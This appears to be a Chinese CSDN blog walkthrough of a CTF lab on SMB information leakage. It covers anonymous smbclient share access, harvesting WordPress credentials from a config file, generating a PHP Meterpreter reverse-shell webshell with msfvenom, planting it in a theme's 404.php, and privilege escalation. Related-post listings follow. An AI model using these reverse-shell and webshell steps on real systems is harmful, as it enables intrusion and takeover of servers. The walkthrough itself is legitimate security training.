CTF-7.SMB信息泄露

最新推荐文章于 2024-04-05 19:58:38 发布
最新推荐文章于 2024-04-05 19:58:38 发布
阅读量581 收藏 2
点赞数
分类专栏: ctf 文章标签: linux 网络 bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woo233/article/details/126823181
版权

SMB介绍

SMB (Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。

SMB协议是基于TCP - NETBIOS下的,一般端口使用为139,445

SMB协议,计算机可以访问网络资源,下载对应的资源文件

实验环境

1.kali linux 192.168.253.12
2.靶场机器192.168.253.17
接下来该做什么呢?
目的:获取靶场机器上的flag值;

信息探测

对于只是给定一个对应IP地址的靶场机器,我们需要用对其进行扫描,探测开放的服务。
渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限

- nmap -sV IP   挖掘开放服务信息
- nmap -A -v -T4 IP   挖掘靶场全部信息

在这里插入图片描述
从图中已知开放139,445端口

针对SMB协议弱点分析

1.钛怼SMB协议。使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;

-- smbclient -L lP  //列出该ip所分享的目录和链接
-- smbclient '\\IP\$share'
-- get 敏感文件 //下载文件

在这里插入图片描述
print$共享设备,share文件夹,IPC表示空连接,不需要用户也可登录web。
接下来探索这些文件夹中有哪些内容。smbclient '\\IP\$share'

print没有权限在这里插入图片描述
发现print$共享设备,share文件夹,IPC表示空连接,这三个中只有文件夹可以查看(在登录文件夹时,让你输入password可以尝试用空进行登录),针对文件夹使用-- get 敏感文件获取信息
在这里插入图片描述
.为当前目录,…为上级目录,查看wordpress中是否有信息,cd wordpress
在这里插入图片描述
配置文件中一般具有用户和密码,下载配置文件并查看
在这里插入图片描述

查看文件结果如图:

在这里插入图片描述
发现有一个数据库mysql,尝试进行远程登录,发现不行,
在这里插入图片描述
原本探测时,发现开放ssh 22端口
在这里插入图片描述
但是,发现密码并不正确

2.针对SMB协议远程溢出漏洞进行分析;-- searchsploit samba 版本号
在这里插入图片描述
使用2个版本号进行探测发现无信息
在这里插入图片描述

针对ssh和mysql进行登录受到权限的限制
改为:
针对HTTP协议弱点分析
步骤:
1.浏览器查看网站;

2.使用dirb nikto探测;

3.寻找突破点,目标登录后台,上传webshell;

1.探测:

在这里插入图片描述
在这里插入图片描述
打开这个界面出现:
在这里插入图片描述
使用Admin和前面获取的密码进行登陆。
在这里插入图片描述
发现登录到web页面之后,可以通过制作webshell

制作webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机P地址 lport=4444 -f raw >/root/Desktop/shell.php

在这里插入图片描述

输入msfconsole,启动监听
输入msfconsole

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 攻击机iP地址
msf exploit(handler) > set lport 4444
msf exploit(handler)> run

启动完了之后输入use exploit/multi/handler
在这里插入图片描述
在这里插入图片描述

上传Webshell

使用找到的敏感信息登录系统后台,上传webshell。执行webshell(访问具有webshell的php页面)

获得反弹的shell
– wordpress上传点theme 404.php
执行: http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php

通过前面获取的系统后台,点击editor,结果如图所示:
在这里插入图片描述
再找到404.php,如图所示
在这里插入图片描述
把前面生成的webshell脚本覆盖放到404.php中,再点击uplate file上传文件
在这里插入图片描述
上传成功之后404界面就是webshell。
上传的webshell具有固定页面:http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php

再查看终端,已完成监控:
在这里插入图片描述

查找flag信息

优化终端: python -c “import pty; pty.spawn(” /bin/bash")'查找敏感信息,提升root权限,查看flag值。
查找用户名: cat /etc/passwd
在这里插入图片描述
如上图所示,找到了togie这一个用户名,

查找密码:在共享目录下的敏感文件,提升权限
-- su  用户名
-- sudo -l
-- su sudo

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

总结

对于开放139和445端口的机器一定要注意是否可以直接使用smbclient登录到共享目录查找敏感文件。

一般情况下flag值都在/root目录下,并且需要提升root权限才能查看内容;

wow2ok
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF 信息泄露
weixin_59676380的博客
04-15 309
文章目录 前言 记录CTFhub备份文件下载 学习过程 一、网站源码 1、开启题目 2、进入环境 ###1、通过下方链接进入环境 ###2、查看题目要求 ####①打开备份文件下载题目后,用Burp Suite软件抓网站 ####①先将这个页面开启 ####②将网站复制到界面里 ####③会跳到这个界面 ####④开启后Proxy这个会变红 ####⑤调整界面 ####⑥ ####⑦开始抓,抓到不一样的网站是www.zip ####⑧回到网站源码的界面输入网址 ####⑨复制这个文件在网
一、CTF-Web-信息泄露(记录CTF学习)
qq_27920699的博客
12-16 2941
个人CTF学习之路
SMB服务信息泄露
wwxxss
11-03 548
SMB信息泄露的详细渗透过程
CTF中的信息泄露
meteox的博客
08-04 2253
服务器之前没咋用,后面的时间应该也没啥时间用了,就没续费了,GitHub page 直接上传图片访问速度又很慢,主题出bug也懒得折腾了,想来还是直接在csdn上写方便很多,也不用重新找图床啥的,之前有很多没写完的笔记,现在有时间也慢慢整理总结下。 一般先用dirmap扫一下,看下有没有信息泄露CTF中不太建议用御剑的那些字典,很多没用的不必要扫 python3 dirmap.py -i https://target.com -lcf 网站备份文件 在网站的使用过程中,往往需要对网站中的文件进行修改、
CTF-SMB信息泄露【简单易懂】
不知名白帽的博客
08-17 2812
CTF-SMB信息泄露【简单易懂】
CTF信息泄露.(CTFHub靶场环境)
网络安全领域___专研者.
07-31 3517
信息泄露 ” 是指网站无意间向用户泄露敏感信息泄露了有关于其他用户的数据,例如:另一个用户名的财务信息,敏感的商业 或 商业数据 ,还有一些有关网站及其基础架构的技术细节 等泄露信息泄露敏感的用户或业务数据的危险相当明显,但是泄露技术信息有时可能同样严重,尽管某些信息用途有限,但它可能是暴露其他攻击面的起点,其中可能包含其他的漏洞
CTF夺旗-SMB信息泄露-靶机渗透实战
居上
11-28 988
SMB信息泄露信息收集服务利用针对SMB尝试空口令登陆针对SMB远程溢出漏洞进行分析针对HTTP协议弱点分析上传WebShell 实验环境 攻击机:192.168.36.128 靶机:192.168.36.138 靶机下载地址 链接:https://pan.baidu.com/s/13L3humuHmHFRu2aqwHatZg 提取码:ox8g 信息收集 nmap -sV {ip} #探测目标的服务以及版本 nmap -A -v -T4 #{-A}扫描所有信息,{-v}屏幕回显,{-T4}以最快线程 服
CTF训练笔记(三)- SMB信息泄露
morrino的博客
02-05 1675
大量搜索各种信息,尝试利用各种途径拿到shell进而提权。[CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
CTF练习:SMB信息泄露
qq_43233085的博客
11-18 1295
CTF练习:SMB信息泄露环境准备信息收集深度挖掘进入靶机 靶机地址: 链接:https://pan.baidu.com/s/1XupHpFMZee7pzTax5xiMxw 提取码:fa49 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172.19.75.237 ping一下...
CTF训练 SMB信息泄露(含靶场下载地址)
ZY_Jack的博客
12-07 1138
SMB信息泄露确认ip,挖掘信息针对smb协议弱点探测针对http协议弱点探测构造payload获取shell在wordpress中上传webshell优化终端获得flag 确认ip,挖掘信息 仍然是首先查看ip,通过sudo -i 获取root,然后用netdiscover找到靶机的地址。 靶机的ip是192.168.43.120 因为虚拟机的网络设置选的是桥接模式,所以后面显示的是vmware, Inc。 挖掘开放信息服务:nmap -sV 192.168.43.17 针对smb协议弱点探测 因
CTF信息泄漏.pdf
02-11
CTF信息泄漏
CTF中的GIT泄露
zy_mpy的博客
03-13 964
由于本人也是一名ctf的萌新,所以笔记比较易懂但又不可避免的浅显,如有错误,欢迎各路大神来指正。先简单介绍一下Git,Git是一个开源的分布式版本控制系统,在执行git init初始化目录的时候,会在当前目录下自动创建一个.git目录,用来记录代码的变更记录等。发布代码的时候,如果没有把,git这个目录删除,就直接发布到了服务器上,攻击者就可以通过它来恢复源代码,这就引起了git泄露漏洞。处理Git泄露的题目时,需要用到scrabble,dirsearch和gihack三个工具。一、常规git泄露常规 gi
CTFHUB | 信息泄露
2302_80946742的博客
04-05 610
打开环境,点击开始寻找flag看看有什么东西可以看到,这里给出了网站的部分目录,我们可以点击进行访问首先我们要明白,访问网站就是访问其目录中的文件,例如我们看到的网站首页,一般都是位于网站/var/www/html目录下的index文件中。可以这样理解,一个网站就是由各级目录和其中的文件组成的。这里我们既然可以访问目录,题目又是遍历目录,那么我们就来看看这些目录里面都有什么东西。
ctfhub-信息泄露
yzl_007的博客
01-30 676
敏感目录泄露 1、git泄露–log 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。 先使用dirsearch扫描是否存在git泄露 python3 dirsearch.py -u <url> -e * 使用githack扫描 python GitHack.py <url>/.git/ 扫描结束后会生成扫描后的文件,在dist里面找到对应的网页文件 使用cmd或者git git lo
CTFhub——信息泄露
weixin_45664911的博客
09-22 505
目录遍历 方法一:手动遍历 方法二:利用脚本遍历 import requests url="http://challenge-dec394c8f6115d11.sandbox.ctfhub.com:10080/flag_in_here/" for i in range(5): for j in range(5): url_test=url+str(i)+"/"+str(j) r =requests.get(url_test) r.encoding
SMB信息泄露
qq_39687353的博客
04-10 7306
SMB信息泄露服务攻击
小白学习CTF第三天-SMB信息泄露
bbhh1139的博客
04-11 436
SMB信息泄露 SMB介绍 信息探测 基本操作与之前的一样,这里就不过多叙述了。 信息探测的方式有很多: 分析探测结果与之前的都类似,基本上分析以下nmap扫描出来的结果。 针对SMB协议弱点进行分析 针对上面的进行一下实际操作: IPC我们没有权限查看这个就失败了,换一个扫描 换成share$: 我们get敏感文件之后,我们记得查看一下,并且记住里面出现的敏感信息: 之后我们在去找...
smb信息泄露实战
weixin_51339377的博客
03-30 260
1.正常使用nmap进行目标的扫描 我们可以尝试下载里面的文件 使用get命令即可下载 此时文件提示密码是12345 在查看一下其他的文件目录 cd /wordpress ls wordpress的目录中一般都是有配置文件的 我们通过get把wordpress的配置文件下载下来 接下来可以尝试去网站进行登录 由于不知道登录的后台地址 我们可以首先通过工具对目标网站进行扫描 这里可以通过dirb进行扫描 dirb http://192.168.1.47 ..
https://ctf-wiki.org/
最新发布
06-01
https://ctf-wiki.org/是一个关于CTF(夺旗赛)的详细介绍网站,内容包括CTF的基础知识、题目类型、工具使用、比赛平台等,是CTF爱好者必备的网站之一。以下是一个简单的介绍网站的例子: 根据https://ctf-wiki.org/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wow2ok

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值